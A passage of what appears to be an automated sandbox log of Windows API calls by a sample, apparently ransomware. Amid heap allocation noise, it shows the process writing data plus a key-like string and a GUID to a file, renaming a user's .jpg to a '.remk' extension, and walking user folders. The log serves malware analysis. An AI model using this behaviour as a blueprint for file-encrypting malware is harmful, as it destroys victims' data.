Flags=0x0, Size=0xc) returned 0x31ee2c8 [0232.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0232.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2e0 [0232.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2b0 [0232.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee340 [0232.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0232.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee310 [0232.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2f8 [0232.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee358 [0232.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee2f8 [0232.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee310 | out: hHeap=0x630000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0232.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0232.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0232.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2c8 | out: hHeap=0x630000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2c8 [0232.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0232.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee328 | out: hHeap=0x630000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0232.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee358 | out: hHeap=0x630000) returned 1 [0232.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0232.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0232.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0232.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0232.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2c8 | out: hHeap=0x630000) returned 1 [0232.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0232.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0232.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0232.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0232.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0232.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0232.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee340 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2e0 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2b0 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee298 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bb468 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.895] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x10d8a, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x10d8a, lpOverlapped=0x0) returned 1 [0232.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0232.895] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10d8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.895] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0232.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0232.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0232.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.896] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0232.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.896] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.896] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.896] CloseHandle (hObject=0x640) returned 1 [0232.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ec8 [0232.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x37b5b70 [0232.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3ec8 | out: hHeap=0x630000) returned 1 [0232.901] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YyKbPUy.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yykbpuy.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YyKbPUy.jpg.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yykbpuy.jpg.remk")) returned 1 [0232.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.902] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0232.904] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66b38ff0, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0xc0ae7fa0, ftLastAccessTime.dwHighDateTime=0x1d5e5f4, ftLastWriteTime.dwLowDateTime=0xc0ae7fa0, ftLastWriteTime.dwHighDateTime=0x1d5e5f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dqq7i08G7zkmy4eWB", cAlternateFileName="_DQQ7I~1")) returned 1 [0232.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0232.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x310) returned 0x31c0d08 [0232.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e018 [0232.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325df48 [0232.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e3c0 [0232.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ec8 [0232.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0232.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba498 [0232.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba420 [0232.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba768 [0232.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba7e0 [0232.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba858 [0232.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e428 [0232.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694ec0 [0232.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba8d0 [0232.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba948 [0232.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0232.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e5c8 [0232.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba9c0 [0232.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dda8 | out: hHeap=0x630000) returned 1 [0232.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e358 | out: hHeap=0x630000) returned 1 [0232.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e4f8 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3dd8 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3ce8 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3e50 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba678 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e560 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3c70 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3bf8 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e2f0 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba510 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0232.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0232.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.916] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66b38ff0, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0xc0ae7fa0, ftLastAccessTime.dwHighDateTime=0x1d5e5f4, ftLastWriteTime.dwLowDateTime=0xc0ae7fa0, ftLastWriteTime.dwHighDateTime=0x1d5e5f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dqq7i08G7zkmy4eWB", cAlternateFileName="_DQQ7I~1")) returned 0 [0232.986] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0232.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0232.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0232.986] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e2f0 [0232.986] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e560 | out: hHeap=0x630000) returned 1 [0232.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e560 | out: hHeap=0x630000) returned 1 [0232.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e560 | out: hHeap=0x630000) returned 1 [0232.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e560 | out: hHeap=0x630000) returned 1 [0232.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e560 | out: hHeap=0x630000) returned 1 [0232.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e560 | out: hHeap=0x630000) returned 1 [0232.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0232.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e560 | out: hHeap=0x630000) returned 1 [0232.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e560 | out: hHeap=0x630000) returned 1 [0232.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e560 | out: hHeap=0x630000) returned 1 [0232.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e560 | out: hHeap=0x630000) returned 1 [0232.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.989] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0232.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb468 [0232.989] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0232.989] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.989] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.989] PathFindFileNameW (pszPath="") returned="" [0232.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.989] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66b38ff0, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0xc0ae7fa0, ftLastAccessTime.dwHighDateTime=0x1d5e5f4, ftLastWriteTime.dwLowDateTime=0xc0ae7fa0, ftLastWriteTime.dwHighDateTime=0x1d5e5f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dqq7i08G7zkmy4eWB", cAlternateFileName="_DQQ7I~1")) returned 0xffffffff [0232.990] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5498 [0232.990] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.990] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0232.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb468 [0232.990] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0232.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.990] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.990] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.990] PathFindFileNameW (pszPath="") returned="" [0232.990] RtlAllocateHeap 